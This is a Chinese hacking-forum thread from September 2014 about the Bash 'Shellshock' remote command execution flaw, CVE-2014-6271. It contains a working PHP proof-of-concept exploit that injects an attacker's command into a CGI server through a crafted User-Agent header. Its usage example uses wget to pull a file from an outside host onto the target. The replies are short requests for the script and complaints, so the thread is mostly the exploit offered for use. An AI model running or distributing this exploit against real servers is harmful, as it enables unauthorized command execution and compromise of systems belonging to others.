BASH远程命令执行漏洞【POC】

aming · 发表于 2014-9-25 19:44:04

BASH远程命令执行漏洞【POC】

使用方法：

php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd

例子：
php bash.php -u http://localhost/cgi-bin/hello -c "wget http://website.com-O /tmp/shit"

谁有账号？

https://www.t00ls.net/thread-27957-1-1.html

xfspace · 发表于 2014-9-25 19:55:01

标题党啊

wmfy808 · 发表于 2014-9-25 20:05:24

到底怎么使用

卖女孩的小火柴 · 发表于 2014-9-25 20:08:45

提示: 作者被禁止或删除内容自动屏蔽

aming · 发表于 2014-9-25 20:24:22

卖女孩的小火柴发表于 2014-9-25 20:08
bash.php搞一个过来

谁有账号？

https://www.t00ls.net/thread-27957-1-1.html

Polymer_dg · 发表于 2014-9-25 20:50:55

<?php
/*
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
Test CGI Code : #!/bin/bash
echo “Content-type: text/html”
echo “”
echo “Bash-is-Vulnerable”
*/
error_reporting( 0 );
if (!defined(‘STDIN’)) die( “Please run it through command-line!\n” );
$x = getopt( “u:c:” );
if (!isset($x['u']) || !isset($x['c']))
{
die( “Usage: “ .$_SERVER['PHP_SELF']. ” -u URL -c cmd\n” );
}
$url = $x['u'];
$cmd = $x['c'];
$context = stream_context_create(
array(
‘http’ => array(
‘method’ => ‘GET’,
‘header’ => ‘User-Agent: () { :;}; /bin/bash -c  “‘.$cmd.’” ‘
)
)
);

if (!file_get_contents($url,  false , $context) && strpos($http_response_header[ 0 ], “500″ ) >  0 )
die( “Command sent to the server!\n” );
else
die( “Connection Error\n” );
?>

		自动登录	找回密码
密码			注册

卖女孩的小火柴卖女孩的小火柴当前离线积分 2326	发表于 2014-9-25 20:08:45 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
卖女孩的小火柴卖女孩的小火柴当前离线积分 2326
	回复支持反对举报

BASH远程命令执行漏洞【POC】

相关帖子